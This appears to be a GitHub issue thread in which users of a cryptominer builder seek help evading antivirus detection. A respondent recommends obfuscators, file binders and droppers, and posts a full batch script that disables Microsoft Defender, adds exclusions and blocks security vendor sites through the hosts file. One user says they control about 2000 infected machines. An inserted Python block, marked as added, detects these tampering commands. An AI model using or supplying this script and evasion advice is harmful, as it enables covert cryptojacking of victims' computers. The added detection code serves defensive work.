Closed WexisQ closed 3 years ago
still detect
Yeah usually you have to test different obfuscator settings until it becomes undetected. Sometimes rebuilding the miner works as well since it will encrypt everything differently every time.
can you show me the settings what i do i don't work
It's always different since the obfuscations and final results are random and it also depends on if the antivirus has gotten some sort of update then different settings will give different results.
I've tried all kinds of things, it just never happens, always perceives
Some options will increase some detections and some will decrease some. In the worst case it can be easier to find another obfuscator since so many use it and thus it increases the detections.
please help me on the internet crypter i can't find It doesn't happen in any way, it's always detected
Are the detections different every time?
I made such a setting that it is not caught by antiviruses but it does not work when I run the virus
Yeah the "Compress & Encrypt resources" might do that. If you press the cogwheel next to the option there might be some setting that won't break it.
I tried all the options. What should I do? I tried crypters on the internet, but it doesn't work. Do you want to tell your own way
The way I did it was to create a .bat file that "kills" Windows Defender and bind that with the miner with a file binder and when that .bat file ran before the miner it would allow the miner to be used freely since the antivirus was "dead" when the miner ran.
Here is the .bat code I wrote:
powershell -Command Add-MpPreference -ExclusionPath '%cd%'
powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1 www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1 www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
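The commands in the script above leave distinctive traces in process-creation logs and in the hosts file. As an added example (not part of the original thread), the following Python code flags those traces; the rule names, the sample command lines, the sample hosts content and the watched-domain list are constructed for illustration.

```python
import re

# Rule names are assumptions of this example; the patterns cover the
# command families quoted in the script above.
RULES = {
    "defender_exclusion_added": re.compile(r"\bAdd-MpPreference\b.*-ExclusionPath\b", re.I),
    "defender_protection_disabled": re.compile(
        r"\bSet-MpPreference\b.*(-Disable\w+\s+\$?true\b|-EnableControlledFolderAccess\s+Disabled\b"
        r"|-MAPSReporting\s+Disabled\b|-SubmitSamplesConsent\s+NeverSend\b)", re.I),
    "defender_policy_key": re.compile(
        r"Policies\\Microsoft\\Windows Defender.*DisableAntiSpyware", re.I),
    "defender_service_tamper": re.compile(
        r"\b(sc(\.exe)?\s+(config|stop)|Stop-Service|Set-Service)\s+WinDefend\b", re.I),
    "defender_feature_removed": re.compile(
        r"(Uninstall-WindowsFeature|Remove-WindowsFeature|Disable-Feature).*Windows-Defender", re.I),
}
LOOPBACK = {"127.0.0.1", "0.0.0.0", "::1"}

def classify(cmdline):
    """Return the sorted rule names that match one process command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def distinct_findings(cmdlines):
    """Union of findings over a batch of command lines (e.g. one host, one time window)."""
    return sorted({f for c in cmdlines for f in classify(c)})

def sinkholed_security_hosts(hosts_text, watched):
    """Return watched domains that a hosts file points at a loopback/null address."""
    hits = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()      # drop comments, split on whitespace
        if len(fields) < 2 or fields[0] not in LOOPBACK:
            continue
        for name in fields[1:]:
            name = name.lower()
            base = name[4:] if name.startswith("www.") else name
            if base in watched and base not in hits:
                hits.append(base)
    return hits

# Constructed sample data: three tampering command lines, two benign ones.
SAMPLE_CMDLINES = [
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\demo\AppData\Roaming'",
    "powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "sc config WinDefend start=disabled",
    "powershell -Command Get-MpPreference",
    "sc query WinDefend",
]
WATCHED = {"virustotal.com", "malwarebytes.com", "any.run"}
SAMPLE_HOSTS = "127.0.0.1 localhost\n127.0.0.1 www.virustotal.com\n" \
               "127.0.0.1 malwarebytes.com  # constructed\n10.0.0.5 intranet.example\n"
```

Microsoft Defender itself also records these changes in the Microsoft-Windows-Windows Defender/Operational log: event 5007 for a configuration change and event 5001 when real-time protection is turned off.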
thanks what exactly do i need to do this ?
please let help to encrypt
Well, to use the .bat file you would just have to create it and bind it first before the other file though making the window invisible might be a bit harder.
This is what I don't understand. ok i bind with the .bat file but already when the virus is downloaded from the internet the defender deletes it automatically
If it's bound with a file binder then the miner will be encrypted inside the program so the antivirus wouldn't be able to read it and thus can't detect it. You will probably have to obfuscate the bound file though since that might have some detections since it's a dropper.
Sorry for my bad English. In the nanopool minimum payout is 1 XMR, 1 XMR is so big a limit. I have around 2000 mines but still I make very hard money. How do I get the minimum payment limit to 0.1 XMR?